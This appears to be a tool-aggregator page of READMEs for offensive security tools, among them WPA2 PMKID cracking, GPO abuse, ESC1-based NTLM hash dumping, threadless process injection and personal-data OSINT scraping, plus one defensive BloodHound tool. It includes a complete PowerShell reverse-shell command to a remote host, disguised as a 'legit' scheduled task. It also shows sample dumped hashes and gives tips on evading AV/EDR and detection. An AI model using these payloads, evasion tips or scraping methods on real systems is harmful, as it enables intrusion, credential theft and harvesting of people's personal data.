❌

Normal view

There are new articles available, click to refresh the page.
Before yesterdayKitPloit - PenTest & Hacking Tools

Pmkidcracker - A Tool To Crack WPA2 Passphrase With PMKID Value Without Clients Or De-Authentication

By: Zion3R
15 January 2024 at 11:30


This program is a tool written in Python to recover the pre-shared key of a WPA2 WiFi network without any de-authentication or requiring any clients to be on the network. It targets the weakness of certain access points advertising the PMKID value in EAPOL message 1.


Program Usage

python pmkidcracker.py -s <SSID> -ap <APMAC> -c <CLIENTMAC> -p <PMKID> -w <WORDLIST> -t <THREADS(Optional)>

NOTE: apmac, clientmac, pmkid must be a hexstring, e.g b8621f50edd9

How PMKID is Calculated

The two main formulas to obtain a PMKID are as follows:

  1. Pairwise Master Key (PMK) Calculation: passphrase + salt(ssid) => PBKDF2(HMAC-SHA1) of 4096 iterations
  2. PMKID Calculation: HMAC-SHA1[pmk + ("PMK Name" + bssid + clientmac)]

This is just for understanding, both are already implemented in find_pw_chunk and calculate_pmkid.

Obtaining the PMKID

Below are the steps to obtain the PMKID manually by inspecting the packets in WireShark.

*You may use Hcxtools or Bettercap to quickly obtain the PMKID without the below steps. The manual way is for understanding.

To obtain the PMKID manually from wireshark, put your wireless antenna in monitor mode, start capturing all packets with airodump-ng or similar tools. Then connect to the AP using an invalid password to capture the EAPOL 1 handshake message. Follow the next 3 steps to obtain the fields needed for the arguments.

Open the pcap in WireShark:

  • Filter with wlan_rsna_eapol.keydes.msgnr == 1 in WireShark to display only EAPOL message 1 packets.
  • In EAPOL 1 pkt, Expand IEEE 802.11 QoS Data Field to obtain AP MAC, Client MAC
  • In EAPOL 1 pkt, Expand 802.1 Authentication > WPA Key Data > Tag: Vendor Specific > PMKID is below

If access point is vulnerable, you should see the PMKID value like the below screenshot:

Demo Run

Disclaimer

This tool is for educational and testing purposes only. Do not use it to exploit the vulnerability on any network that you do not own or have permission to test. The authors of this script are not responsible for any misuse or damage caused by its use.



CloudRecon - Finding assets from certificates

By: Zion3R
16 January 2024 at 11:30


CloudRecon

Finding assets from certificates! Scan the web! Tool presented @DEFCON 31


Install

** You must have CGO enabled, and may have to install gcc to run CloudRecon**

sudo apt install gcc
go install github.com/g0ldencybersec/CloudRecon@latest

Description

CloudRecon

CloudRecon is a suite of tools for red teamers and bug hunters to find ephemeral and development assets in their campaigns and hunts.

Often, target organizations stand up cloud infrastructure that is not tied to their ASN or related to known infrastructure. Many times these assets are development sites, IT product portals, etc. Sometimes they don't have domains at all but many still need HTTPs.

CloudRecon is a suite of tools to scan IP addresses or CIDRs (ex: cloud providers IPs) and find these hidden gems for testers, by inspecting those SSL certificates.

The tool suite is three parts in GO:

Scrape - A LIVE running tool to inspect the ranges for a keywork in SSL certs CN and SN fields in real time.

Store - a tool to retrieve IPs certs and download all their Orgs, CNs, and SANs. So you can have your OWN cert.sh database.

Retr - a tool to parse and search through the downloaded certs for keywords.

Usage

MAIN

Usage: CloudRecon scrape|store|retr [options]

-h Show the program usage message

Subcommands:

cloudrecon scrape - Scrape given IPs and output CNs & SANs to stdout
cloudrecon store - Scrape and collect Orgs,CNs,SANs in local db file
cloudrecon retr - Query local DB file for results

SCRAPE

scrape [options] -i <IPs/CIDRs or File>
-a Add this flag if you want to see all output including failures
-c int
How many goroutines running concurrently (default 100)
-h print usage!
-i string
Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE" )
-p string
TLS ports to check for certificates (default "443")
-t int
Timeout for TLS handshake (default 4)

STORE

store [options] -i <IPs/CIDRs or File>
-c int
How many goroutines running concurrently (default 100)
-db string
String of the DB you want to connect to and save certs! (default "certificates.db")
-h print usage!
-i string
Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE")
-p string
TLS ports to check for certificates (default "443")
-t int
Timeout for TLS handshake (default 4)

RETR

retr [options]
-all
Return all the rows in the DB
-cn string
String to search for in common name column, returns like-results (default "NONE")
-db string
String of the DB you want to connect to and save certs! (default "certificates.db")
-h print usage!
-ip string
String to search for in IP column, returns like-results (default "NONE")
-num
Return the Number of rows (results) in the DB (By IP)
-org string
String to search for in Organization column, returns like-results (default "NONE")
-san string
String to search for in common name column, returns like-results (default "NONE")


pyGPOAbuse - Partial Python Implementation Of SharpGPOAbuse

By: Zion3R
17 January 2024 at 11:30


Python partial implementation of SharpGPOAbuse by@pkb1s

This tool can be used when a controlled account can modify an existing GPO that applies to one or more users & computers. It will create an immediate scheduled task as SYSTEM on the remote computer for computer GPO, or as logged in user for user GPO.

Default behavior adds a local administrator.


How to use

Basic usage

Add john user to local administrators group (Password: H4x00r123..)

./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"

Advanced usage

Reverse shell example

./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \ 
-powershell \
-command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \
-taskname "Completely Legit Task" \
-description "Dis is legit, pliz no delete" \
-user

Credits



FalconHound - A Blue Team Multi-Tool. It Allows You To Utilize And Enhance The Power Of Blo odHound In A More Automated Fashion

By: Zion3R
18 January 2024 at 11:30


FalconHound is a blue team multi-tool. It allows you to utilize and enhance the power of BloodHound in a more automated fashion. It is designed to be used in conjunction with a SIEM or other log aggregation tool.

One of the challenging aspects of BloodHound is that it is a snapshot in time. FalconHound includes functionality that can be used to keep a graph of your environment up-to-date. This allows you to see your environment as it is NOW. This is especially useful for environments that are constantly changing.

One of the hardest releationships to gather for BloodHound is the local group memberships and the session information. As blue teamers we have this information readily available in our logs. FalconHound can be used to gather this information and add it to the graph, allowing it to be used by BloodHound.

This is just an example of how FalconHound can be used. It can be used to gather any information that you have in your logs or security tools and add it to the BloodHound graph.

Additionally, the graph can be used to trigger alerts or generate enrichment lists. For example, if a user is added to a certain group, FalconHound can be used to query the graph database for the shortest path to a sensitive or high-privilege group. If there is a path, this can be logged to the SIEM or used to trigger an alert.


Other examples where FalconHound can be used:

  • Adding, removing or timing out sessions in the graph, based on logon and logoff events.
  • Marking users and computers as compromised in the graph when they have an incident in Sentinel or MDE.
  • Adding CVE information and whether there is a public exploit available to the graph.
  • All kinds of Azure activities.
  • Recalculating the shortest path to sensitive groups when a user is added to a group or has a new role.
  • Adding new users, groups and computers to the graph.
  • Generating enrichment lists for Sentinel and Splunk of, for example, Kerberoastable users or users with ownerships of certain entities.

The possibilities are endless here. Please add more ideas to the issue tracker or submit a PR.

A blog detailing more on why we developed it and some use case examples can be found here

Index:

Supported data sources and targets

FalconHound is designed to be used with BloodHound. It is not a replacement for BloodHound. It is designed to leverage the power of BloodHound and all other data platforms it supports in an automated fashion.

Currently, FalconHound supports the following data sources and or targets:

  • Azure Sentinel
  • Azure Sentinel Watchlists
  • Splunk
  • Microsoft Defender for Endpoint
  • Neo4j
  • MS Graph API (early stage)
  • CSV files

Additional data sources and targets are planned for the future.

At this moment, FalconHound only supports the Neo4j database for BloodHound. Support for the API of BH CE and BHE is under active development.


Installation

Since FalconHound is written in Go, there is no installation required. Just download the binary from the release section and run it. There are compiled binaries available for Windows, Linux and MacOS. You can find them in the releases section.

Before you can run it, you need to create a config file. You can find an example config file in the root folder. Instructions on how to creat all crededentials can be found here.

The recommened way to run FalconHound is to run it as a scheduled task or cron job. This will allow you to run it on a regular basis and keep your graph, alerts and enrichments up-to-date.

Requirements

  • BloodHound, or at least the Neo4j database for now.
  • A SIEM or other log aggregation tool. Currently, Azure Sentinel and Splunk are supported.
  • Credentials for each endpoint you want to talk to, with the required permissions.

Configuration

FalconHound is configured using a YAML file. You can find an example config file in the root folder. Each section of the config file is explained below.


Usage

Default run

To run FalconHound, just run the binary and add the -go parameter to have it run all queries in the actions folder.

./falconhound -go

List all enabled actions

To list all enabled actions, use the -actionlist parameter. This will list all actions that are enabled in the config files in the actions folder. This should be used in combination with the -go parameter.

./falconhound -actionlist -go

Run with a select set of actions

To run a select set of actions, use the -ids parameter, followed by one or a list of comma-separated action IDs. This will run the actions that are specified in the parameter, which can be very handy when testing, troubleshooting or when you require specific, more frequent updates. This should be used in combination with the -go parameter.

./falconhound -ids action1,action2,action3 -go

Run with a different config file

By default, FalconHound will look for a config file in the current directory. You can also specify a config file using the -config flag. This can allow you to run multiple instances of FalconHound with different configurations, against different environments.

./falconhound -go -config /path/to/config.yml

Run with a different actions folder

By default, FalconHound will look for the actions folder in the current directory. You can also specify a different folder using the -actions-dir flag. This makes testing and troubleshooting easier, but also allows you to run multiple instances of FalconHound with different configurations, against different environments, or at different time intervals.

./falconhound -go -actions-dir /path/to/actions

Run with credentials from a keyvault

By default, FalconHound will use the credentials in the config.yml (or a custom loaded one). By setting the -keyvault flag FalconHound will get the keyvault from the config and retrieve all secrets from there. Should there be items missing in the keyvault it will fall back to the config file.

./falconhound -go -keyvault

Actions

Actions are the core of FalconHound. They are the queries that FalconHound will run. They are written in the native language of the source and target and are stored in the actions folder. Each action is a separate file and is stored in the directory of the source of the information, the query target. The filename is used as the name of the action.

Action folder structure

The action folder is divided into sub-directories per query source. All folders will be processed recursively and all YAML files will be executed in alphabetical order.

The Neo4j actions should be processed last, since their output relies on other data sources to have updated the graph database first, to get the most up-to-date results.

Action files

All files are YAML files. The YAML file contains the query, some metadata and the target(s) of the queried information.

There is a template file available in the root folder. You can use this to create your own actions. Have a look at the actions in the actions folder for more examples.

While most items will be fairly self explanatory,there are some important things to note about actions:

Enabled

As the name implies, this is used to enable or disable an action. If this is set to false, the action will not be run.

Enabled: true

Debug

This is used to enable or disable debug mode for an action. If this is set to true, the action will be run in debug mode. This will output the results of the query to the console. This is useful for testing and troubleshooting, but is not recommended to be used in production. It will slow down the processing of the action depending on the number of results.

Debug: false

Query

The Query field is the query that will be run against the source. This can be a KQL query, a SPL query or a Cypher query depending on your SourcePlatform. IMPORTANT: Try to keep the query as exact as possible and only return the fields that you need. This will make the processing of the results faster and more efficient.

Additionally, when running Cypher queries, make sure to RETURN a JSON object as the result, otherwise processing will fail. For example, this will return the Name, Count, Role and Owners of the Azure Subscriptions:

MATCH p = (n)-[r:AZOwns|AZUserAccessAdministrator]->(g:AZSubscription) 
RETURN {Name:g.name , Count:COUNT(g.name), Role:type(r), Owners:COLLECT(n.name)}

Targets

Each target has several options that can be configured. Depending on the target, some might require more configuration than others. All targets have the Name and Enabled fields. The Name field is used to identify the target. The Enabled field is used to enable or disable the target. If this is set to false, the target will be ignored.

CSV

  - Name: CSV
Enabled: true
Path: path/to/filename.csv

Neo4j

The Neo4j target will write the results of the query to a Neo4j database. This output is per line and therefore it requires some additional configuration. Since we can transfer all sorts of data in all directions, FalconHound needs to understand what to do with the data. This is done by using replacement variables in the first line of your Cypher queries. These are passed to Neo4j as parameters and can be used in the query. The ReplacementFields fields are configured below.

  - Name: Neo4j
Enabled: true
Query: |
MATCH (x:Computer {name:$Computer}) MATCH (y:User {objectid:$TargetUserSid}) MERGE (x)-[r:HasSession]->(y) SET r.since=$Timestamp SET r.source='falconhound'
Parameters:
Computer: Computer
TargetUserSid: TargetUserSid
Timestamp: Timestamp

The Parameters section defines a set of parameters that will be replaced by the values from the query results. These can be referenced as Neo4j parameters using the $parameter_name syntax.

Sentinel

The Sentinel target will write the results of the query to a Sentinel table. The table will be created if it does not exist. The table will be created in the workspace that is specified in the config file. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.

This is why also query output needs to be controlled, you might otherwise flood your target.

  - Name: Sentinel
Enabled: true

Sentinel Watchlists

The Sentinel Watchlists target will write the results of the query to a Sentinel watchlist. The watchlist will be created if it does not exist. The watchlist will be created in the workspace that is specified in the config file. All columns returned by the query will be added to the watchlist.

 - Name: Watchlist
Enabled: true
WatchlistName: FH_MDE_Exploitable_Machines
DisplayName: MDE Exploitable Machines
SearchKey: DeviceName
Overwrite: true

The WatchlistName field is the name of the watchlist. The DisplayName field is the display name of the watchlist.

The SearchKey field is the column that will be used as the search key.

The Overwrite field is used to determine if the watchlist should be overwritten or appended to. If this is set to false, the results of the query will be appended to the watchlist. If this is set to true, the watchlist will be deleted and recreated with the results of the query.

Splunk

Like Sentinel, Splunk will write the results of the query to a Splunk index. The index will need to be created and tied to a HEC endpoint. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.

  - Name: Splunk
Enabled: true

Azure Data Explorer

Like Sentinel, Splunk will write the results of the query to a ADX table. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.

  - Name: ADX
Enabled: true
Table: "name"

Extensions to the graph

Relationship: HadSession

Once a session has ended, it had to be removed from the graph, but this felt like a waste of information. So instead of removing the session,it will be added as a relationship between the computer and the user. The relationship will be called HadSession. The relationship will have the following properties:

{
"till": "2021-08-31T14:00:00Z",
"source": "falconhound",
"reason": "logoff",
}

This allows for additional path discoveries where we can investigate whether the user ever logged on to a certain system, even if the session has ended.

Properties

FalconHound will add the following properties to nodes in the graph:

Computer: - 'exploitable': true/false - 'exploits': list of CVEs - 'exposed': true/false - 'ports': list of ports accessible from the internet - 'alertids': list of alert ids

Credential management

The currently supported ways of providing FalconHound with credentials are:

  • Via the config.yml file on disk.
  • Keyvault secrets. This still requires a ServicePrincipal with secrets in the yaml.
  • Mixed mode.

Config.yml

The config file holds all details required by each platform. All items in the config file are case-sensitive. Best practise is to separate the apps on a per service level but you can use 1 AppID/AppSecret for all Azure based actions.

The required permissions for your AppID/AppSecret are listed here.

Keyvault

A more secure way of storing the credentials would be to use an Azure KeyVault. Be aware that there is a small cost aspect to using Keyvaults. Access to KeyVaults currently only supports authentication based on a AppID/AppSecret which needs to be configured in the config.yml file.

The recommended way to set this up is to use a ServicePrincipal that only has the Key Vault Secrets User role to this Keyvault. This role only allows access to the secrets, not even list them. Do NOT reuse the ServicePrincipal which has access to Sentinel and/or MDE, since this almost completely negates the use of a Keyvault.

The items to configure in the Keyvault are listed below. Please note Keyvault secrets are not case-sensitive.

SentinelAppSecret
SentinelAppID
SentinelTenantID
SentinelTargetTable
SentinelResourceGroup
SentinelSharedKey
SentinelSubscriptionID
SentinelWorkspaceID
SentinelWorkspaceName
MDETenantID
MDEAppID
MDEAppSecret
Neo4jUri
Neo4jUsername
Neo4jPassword
GraphTenantID
GraphAppID
GraphAppSecret
AdxTenantID
AdxAppID
AdxAppSecret
AdxClusterURL
AdxDatabase
SplunkUrl
SplunkApiToken
SplunkIndex
SplunkApiPort
SplunkHecToken
SplunkHecPort
BHUrl
BHTokenID
BHTokenKey
LogScaleUrl
LogScaleToken
LogScaleRepository

Once configured you can add the -keyvault parameter while starting FalconHound.

Mixed mode / fallback

When the -keyvault parameter is set on the command-line, this will be the primary source for all required secrets. Should FalconHound fail to retrieve items, it will fall back to the equivalent item in the config.yml. If both fail and there are actions enabled for that source or target, it will throw errors on attempts to authenticate.

Deployment

FalconHound is designed to be run as a scheduled task or cron job. This will allow you to run it on a regular basis and keep your graph, alerts and enrichments up-to-date. Depending on the amount of actions you have enabled, the amount of data you are processing and the amount of data you are writing to the graph, this can take a while.

All log based queries are built to run every 15 minutes. Should processing take too long you might need to tweak this a little. If this is the case it might be recommended to disable certain actions.

Also there might be some overlap with for instance the session actions. If you have a lot of sessions you might want to disable the session actions for Sentinel and rely on the one from MDE. This is assuming you have MDE and Sentinel connected and most machines are onboarded into MDE.

Sharphound / Azurehound

While FalconHound is designed to be used with BloodHound, it is not a replacement for Sharphound and Azurehound. It is designed to compliment the collection and remove the moment-in-time problem of the peroiodic collection. Both Sharphound and Azurehound are still required to collect the data, since not all similar data is available in logs.

It is recommended to run Sharphound and Azurehound on a regular basis, for example once a day/week or month, and FalconHound every 15 minutes.

License

This project is licensed under the BSD3 License - see the LICENSE file for details.

This means you can use this software for free, even in commercial products, as long as you credit us for it. You cannot hold us liable for any damages caused by this software.



ADCSync - Use ESC1 To Perform A Makeshift DCSync And Dump Hashes

By: Zion3R
19 January 2024 at 11:30


This is a tool I whipped up together quickly to DCSync utilizing ESC1. It is quite slow but otherwise an effective means of performing a makeshift DCSync attack without utilizing DRSUAPI or Volume Shadow Copy.


This is the first version of the tool and essentially just automates the process of running Certipy against every user in a domain. It still needs a lot of work and I plan on adding more features in the future for authentication methods and automating the process of finding a vulnerable template.

python3 adcsync.py -u clu -p theperfectsystem -ca THEGRID-KFLYNN-DC-CA -template SmartCard -target-ip 192.168.0.98 -dc-ip 192.168.0.98 -f users.json -o ntlm_dump.txt

___ ____ ___________
/ | / __ \/ ____/ ___/__ ______ _____
/ /| | / / / / / \__ \/ / / / __ \/ ___/
/ ___ |/ /_/ / /___ ___/ / /_/ / / / / /__
/_/ |_/_____/\____//____/\__, /_/ /_/\___/
/____/

Grabbing user certs:
100%|β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ| 105/105 [02:18<00:00, 1.32s/it]
THEGRID.LOCAL/shirlee.saraann::aad3b435b51404eeaad3b435b51404ee:68832255545152d843216ed7bbb2d09e:::
THEGRID.LOCAL/rosanne.nert::aad3b435b51404eeaad3b435b51404ee:a20821df366981f7110c07c7708f7ed2:::
THEGRID.LOCAL/edita.lauree::aad3b435b51404eeaad3b435b51404ee:b212294e06a0757547d66b78bb632d69:::
THEGRID.LOCAL/carol.elianore::aad3b435b51404eeaad3b435b51404ee:ed4603ce5a1c86b977dc049a77d2cc6f:::
THEGRID.LOCAL/astrid.lotte::aad3b435b51404eeaad3b435b51404ee:201789a1986f2a2894f7ac726ea12a0b:::
THEGRID.LOCAL/louise.hedvig::aad3b435b51404eeaad3b435b51404ee:edc599314b95cf5635eb132a1cb5f04d:::
THEGRID.LO CAL/janelle.jess::aad3b435b51404eeaad3b435b51404ee:a7a1d8ae1867bb60d23e0b88342a6fab:::
THEGRID.LOCAL/marie-ann.kayle::aad3b435b51404eeaad3b435b51404ee:a55d86c4b2c2b2ae526a14e7e2cd259f:::
THEGRID.LOCAL/jeanie.isa::aad3b435b51404eeaad3b435b51404ee:61f8c2bf0dc57933a578aa2bc835f2e5:::

Introduction

ADCSync uses the ESC1 exploit to dump NTLM hashes from user accounts in an Active Directory environment. The tool will first grab every user and domain in the Bloodhound dump file passed in. Then it will use Certipy to make a request for each user and store their PFX file in the certificate directory. Finally, it will use Certipy to authenticate with the certificate and retrieve the NT hash for each user. This process is quite slow and can take a while to complete but offers an alternative way to dump NTLM hashes.

Installation

git clone https://github.com/JPG0mez/adcsync.git
cd adcsync
pip3 install -r requirements.txt

Usage

To use this tool we need the following things:

  1. Valid Domain Credentials
  2. A user list from a bloodhound dump that will be passed in.
  3. A template vulnerable to ESC1 (Found with Certipy find)
# python3 adcsync.py --help
___ ____ ___________
/ | / __ \/ ____/ ___/__ ______ _____
/ /| | / / / / / \__ \/ / / / __ \/ ___/
/ ___ |/ /_/ / /___ ___/ / /_/ / / / / /__
/_/ |_/_____/\____//____/\__, /_/ /_/\___/
/____/

Usage: adcsync.py [OPTIONS]

Options:
-f, --file TEXT Input User List JSON file from Bloodhound [required]
-o, --output TEXT NTLM Hash Output file [required]
-ca TEXT Certificate Authority [required]
-dc-ip TEXT IP Address of Domain Controller [required]
-u, --user TEXT Username [required]
-p, --password TEXT Password [required]
-template TEXT Template Name vulnerable to ESC1 [required]
-target-ip TEXT IP Address of th e target machine [required]
--help Show this message and exit.

TODO

  • Support alternative authentication methods such as NTLM hashes and ccache files
  • Automatically run "certipy find" to find and grab templates vulnerable to ESC1
  • Add jitter and sleep options to avoid detection
  • Add type validation for all variables

Acknowledgements

  • puzzlepeaches: Telling me to hurry up and write this
  • ly4k: For Certipy
  • WazeHell: For the script to set up the vulnerable AD environment used for testing


Gssapi-Abuse - A Tool For Enumerating Potential Hosts That Are Open To GSSAPI Abuse Within Active Directory Networks

By: Zion3R
20 January 2024 at 11:30


gssapi-abuse was released as part of my DEF CON 31 talk. A full write up on the abuse vector can be found here: A Broken Marriage: Abusing Mixed Vendor Kerberos Stacks

The tool has two features. The first is the ability to enumerate non Windows hosts that are joined to Active Directory that offer GSSAPI authentication over SSH.

The second feature is the ability to perform dynamic DNS updates for GSSAPI abusable hosts that do not have the correct forward and/or reverse lookup DNS entries. GSSAPI based authentication is strict when it comes to matching service principals, therefore DNS entries should match the service principal name both by hostname and IP address.


Prerequisites

gssapi-abuse requires a working krb5 stack along with a correctly configured krb5.conf.

Windows

On Windows hosts, the MIT Kerberos software should be installed in addition to the python modules listed in requirements.txt, this can be obtained at the MIT Kerberos Distribution Page. Windows krb5.conf can be found at C:\ProgramData\MIT\Kerberos5\krb5.conf

Linux

The libkrb5-dev package needs to be installed prior to installing python requirements

All

Once the requirements are satisfied, you can install the python dependencies via pip/pip3 tool

pip install -r requirements.txt

Enumeration Mode

The enumeration mode will connect to Active Directory and perform an LDAP search for all computers that do not have the word Windows within the Operating System attribute.

Once the list of non Windows machines has been obtained, gssapi-abuse will then attempt to connect to each host over SSH and determine if GSSAPI based authentication is permitted.

Example

python .\gssapi-abuse.py -d ad.ginge.com enum -u john.doe -p SuperSecret!
[=] Found 2 non Windows machines registered within AD
[!] Host ubuntu.ad.ginge.com does not have GSSAPI enabled over SSH, ignoring
[+] Host centos.ad.ginge.com has GSSAPI enabled over SSH

DNS Mode

DNS mode utilises Kerberos and dnspython to perform an authenticated DNS update over port 53 using the DNS-TSIG protocol. Currently dns mode relies on a working krb5 configuration with a valid TGT or DNS service ticket targetting a specific domain controller, e.g. DNS/dc1.victim.local.

Examples

Adding a DNS A record for host ahost.ad.ginge.com

python .\gssapi-abuse.py -d ad.ginge.com dns -t ahost -a add --type A --data 192.168.128.50
[+] Successfully authenticated to DNS server win-af8ki8e5414.ad.ginge.com
[=] Adding A record for target ahost using data 192.168.128.50
[+] Applied 1 updates successfully

Adding a reverse PTR record for host ahost.ad.ginge.com. Notice that the data argument is terminated with a ., this is important or the record becomes a relative record to the zone, which we do not want. We also need to specify the target zone to update, since PTR records are stored in different zones to A records.

python .\gssapi-abuse.py -d ad.ginge.com dns --zone 128.168.192.in-addr.arpa -t 50 -a add --type PTR --data ahost.ad.ginge.com.
[+] Successfully authenticated to DNS server win-af8ki8e5414.ad.ginge.com
[=] Adding PTR record for target 50 using data ahost.ad.ginge.com.
[+] Applied 1 updates successfully

Forward and reverse DNS lookup results after execution

nslookup ahost.ad.ginge.com
Server: WIN-AF8KI8E5414.ad.ginge.com
Address: 192.168.128.1

Name: ahost.ad.ginge.com
Address: 192.168.128.50
nslookup 192.168.128.50
Server: WIN-AF8KI8E5414.ad.ginge.com
Address: 192.168.128.1

Name: ahost.ad.ginge.com
Address: 192.168.128.50


DllNotificationInjection - A POC Of A New "Threadless" Process Injection Technique That Works By Utilizing The Concept Of DLL Notification Callbacks In Local And Remote Processes

By: Zion3R
21 January 2024 at 11:30

DllNotificationInection is a POC of a new β€œthreadless” process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.

An accompanying blog post with more details is available here:

https://shorsec.io/blog/dll-notification-injection/


How It Works?

DllNotificationInection works by creating a new LDR_DLL_NOTIFICATION_ENTRY in the remote process. It inserts it manually into the remote LdrpDllNotificationList by patching of the List.Flink of the list head and the List.Blink of the first entry (now second) of the list.

Our new LDR_DLL_NOTIFICATION_ENTRY will point to a custom trampoline shellcode (built with @C5pider's ShellcodeTemplate project) that will restore our changes and execute a malicious shellcode in a new thread using TpWorkCallback.

After manually registering our new entry in the remote process we just need to wait for the remote process to trigger our DLL Notification Callback by loading or unloading some DLL. This obviously doesn't happen in every process regularly so prior work finding suitable candidates for this injection technique is needed. From my brief searching, it seems that RuntimeBroker.exe and explorer.exe are suitable candidates for this, although I encourage you to find others as well.

OPSEC Notes

This is a POC. In order for this to be OPSEC safe and evade AV/EDR products, some modifications are needed. For example, I used RWX when allocating memory for the shellcodes - don't be lazy (like me) and change those. One also might want to replace OpenProcess, ReadProcessMemory and WriteProcessMemory with some lower level APIs and use Indirect Syscalls or (shameless plug) HWSyscalls. Maybe encrypt the shellcodes or even go the extra mile and modify the trampoline shellcode to suit your needs, or at least change the default hash values in @C5pider's ShellcodeTemplate project which was utilized to create the trampoline shellcode.

Acknowledgments



Uscrapper - Powerful OSINT Webscraper For Personal Data Collection

By: Zion3R
22 January 2024 at 11:30


Introducing Uscrapper 2.0, A powerfull OSINT webscrapper that allows users to extract various personal information from a website. It leverages web scraping techniques and regular expressions to extract email addresses, social media links, author names, geolocations, phone numbers, and usernames from both hyperlinked and non-hyperlinked sources on the webpage, supports multithreading to make this process faster, Uscrapper 2.0 is equipped with advanced Anti-webscrapping bypassing modules and supports webcrawling to scrape from various sublinks within the same domain. The tool also provides an option to generate a report containing the extracted details.


Extracted Details:

Uscrapper extracts the following details from the provided website:

  • Email Addresses: Displays email addresses found on the website.
  • Social Media Links: Displays links to various social media platforms found on the website.
  • Author Names: Displays the names of authors associated with the website.
  • Geolocations: Displays geolocation information associated with the website.
  • Non-Hyperlinked Details: Displays non-hyperlinked details found on the website including email addresses phone numbers and usernames.

Whats New?:

Uscrapper 2.0:

  • Introduced multiple modules to bypass anti-webscrapping techniques.
  • Introducing Crawl and scrape: an advanced crawl and scrape module to scrape the websites from within.
  • Implemented Multithreading to make these processes faster.

Installation Steps:

git clone https://github.com/z0m31en7/Uscrapper.git
cd Uscrapper/install/ 
chmod +x ./install.sh && ./install.sh #For Unix/Linux systems

Usage:

To run Uscrapper, use the following command-line syntax:

python Uscrapper-v2.0.py [-h] [-u URL] [-c (INT)] [-t THREADS] [-O] [-ns]


Arguments:

  • -h, --help: Show the help message and exit.
  • -u URL, --url URL: Specify the URL of the website to extract details from.
  • -c INT, --crawl INT: Specify the number of links to crawl
  • -t INT, --threads INT: Specify the number of threads to use while crawling and scraping.
  • -O, --generate-report: Generate a report file containing the extracted details.
  • -ns, --nonstrict: Display non-strict usernames during extraction.

Note:

  • Uscrapper relies on web scraping techniques to extract information from websites. Make sure to use it responsibly and in compliance with the website's terms of service and applicable laws.

  • The accuracy and completeness of the extracted details depend on the structure and content of the website being analyzed.

  • To bypass some Anti-Webscrapping methods we have used selenium which can make the overall process slower.

Contribution:

Want a new feature to be added?

  • Make a pull request with all the necessary details and it will be merged after a review.
  • You can contribute by making the regular expressions more efficient and accurate, or by suggesting some more features that can be added.


Rayder - A Lightweight Tool For Orchestrating And Organizing Your Bug Hunting Recon / Pentesting Command-Line Workflows

By: Zion3R
23 January 2024 at 11:30


Rayder is a command-line tool designed to simplify the orchestration and execution of workflows. It allows you to define a series of modules in a YAML file, each consisting of commands to be executed. Rayder helps you automate complex processes, making it easy to streamline repetitive modules and execute them parallelly if the commands do not depend on each other.


Installation

To install Rayder, ensure you have Go (1.16 or higher) installed on your system. Then, run the following command:

go install github.com/devanshbatham/[email protected]

Usage

Rayder offers a straightforward way to execute workflows defined in YAML files. Use the following command:

rayder -w path/to/workflow.yaml

Workflow Configuration

A workflow is defined in a YAML file with the following structure:

vars:
VAR_NAME: value
# Add more variables...

parallel: true|false
modules:
- name: task-name
cmds:
- command-1
- command-2
# Add more commands...
silent: true|false
# Add more modules...

Using Variables in Workflows

Rayder allows you to use variables in your workflow configuration, making it easy to parameterize your commands and achieve more flexibility. You can define variables in the vars section of your workflow YAML file. These variables can then be referenced within your command strings using double curly braces ({{}}).

Defining Variables

To define variables, add them to the vars section of your workflow YAML file:

vars:
VAR_NAME: value
ANOTHER_VAR: another_value
# Add more variables...

Referencing Variables in Commands

You can reference variables within your command strings using double curly braces ({{}}). For example, if you defined a variable OUTPUT_DIR, you can use it like this:

modules:
- name: example-task
cmds:
- echo "Output directory {{OUTPUT_DIR}}"

Supplying Variables via the Command Line

You can also supply values for variables via the command line when executing your workflow. Use the format VARIABLE_NAME=value to provide values for specific variables. For example:

rayder -w path/to/workflow.yaml VAR_NAME=new_value ANOTHER_VAR=updated_value

If you don't provide values for variables via the command line, Rayder will automatically apply default values defined in the vars section of your workflow YAML file.

Remember that variables supplied via the command line will override the default values defined in the YAML configuration.

